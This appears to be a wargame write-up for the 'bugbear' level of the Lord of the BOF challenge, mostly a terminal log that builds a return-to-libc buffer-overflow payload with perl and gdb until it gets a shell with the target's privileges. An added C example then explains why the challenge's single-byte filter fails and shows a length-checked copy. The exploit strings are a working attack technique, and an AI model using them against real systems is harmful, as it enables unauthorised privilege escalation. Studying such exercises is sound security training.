Heh heh.
It feels good to have solved the RTL one. I floundered a bit at first, but it worked out, so I'm happy!
login: darkknight
Password:
Last login: Sun Mar 16 07:20:14 from 192.168.10.1
[darkknight@localhost darkknight]$ ls -al
total 44
drwx------ 2 darkknig darkknig 4096 Mar 29 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 darkknig darkknig 24 Mar 2 2010 .bash_logout
-rw-r--r-- 1 darkknig darkknig 230 Mar 2 2010 .bash_profile
-rw-r--r-- 1 darkknig darkknig 124 Mar 2 2010 .bashrc
-rwxr-xr-x 1 darkknig darkknig 333 Mar 2 2010 .emacs
-rw-r--r-- 1 darkknig darkknig 3394 Mar 2 2010 .screenrc
-rwsr-sr-x 1 bugbear bugbear 12043 Mar 8 2010 bugbear
-rw-r--r-- 1 root root 385 Mar 29 2010 bugbear.c
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
        char buffer[40];
        int i;
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
        if(argv[1][47] == '\xbf') // now 0xbf~ addresses can't be used at all.
        {
                printf("stack betrayed you!!\n");
                exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
[darkknight@localhost darkknight]$ cp bugbear bugbeer
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ gdb -q bugbeer core
Core was generated by `./bugbeer '.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x90909090 in ?? ()
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/darkknight/bugbeer
Breakpoint 1, 0x8048436 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument
bash: nopx44,: command not found
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`
@AAAABBBB
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`
[darkknight@localhost darkknight]$ ./env ARG
ARG: 0xbffffc9d
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`
@AAAAü ¿
sh: /bin/sh: No such file or directory
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`
@AAAAü ¿
sh: /bin/sh: No such file or directory
Segmentation fault (core dumped) // did a little guessing... heh
[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`
@AAAAü ¿
bash$ exit
exit
Segmentation fault (core dumped)
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`
@AAAAü ¿
bash$ my-pass
euid = 513
Waaah, woohoo!! lol
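
Added example (not part of the original post or the challenge source): the `'\xbf'` check in bugbear.c blacklists a single byte value at offset 47, so an overwrite whose top byte is 0x40, like the libc address seen in gdb above, passes it while still overflowing `buffer[40]`; a length check fixes the bug itself. The function names and the sample inputs are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as buffer[] in bugbear.c */

/* The page's filter: reject only when byte 47 (top byte of the saved
 * return address on little-endian x86) is 0xbf. A length guard is added
 * here because the original reads argv[1][47] even for short arguments. */
int blacklist_rejects(const char *arg)
{
    return strlen(arg) > 47 && (unsigned char)arg[47] == 0xbf;
}

/* Hardened copy: refuse anything that does not fit, instead of guessing
 * which overwritten values are dangerous. Returns 0 on success, -1 if
 * the input plus its NUL terminator would not fit in dst. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed input: 44 filler bytes plus a 4-byte little-endian word
 * whose top byte is `top`. It models the layout only, not a real address. */
void make_input(char *out, unsigned char top)
{
    memset(out, 'A', 44);
    out[44] = 'B'; out[45] = 'B'; out[46] = 'B';
    out[47] = (char)top;
    out[48] = '\0';
}

int main(void)
{
    char in[64], buffer[BUF_SIZE];
    make_input(in, 0xbf);   /* stack-range top byte: caught by the blacklist */
    printf("top=0xbf: blacklist rejects=%d, bounded copy=%d\n",
           blacklist_rejects(in), copy_checked(buffer, sizeof buffer, in));
    make_input(in, 0x40);   /* libc-range top byte: blacklist lets it through */
    printf("top=0x40: blacklist rejects=%d, bounded copy=%d\n",
           blacklist_rejects(in), copy_checked(buffer, sizeof buffer, in));
    return 0;
}
```

Both 48-byte inputs are refused by the bounded copy, whatever the top byte is; only the first is refused by the blacklist.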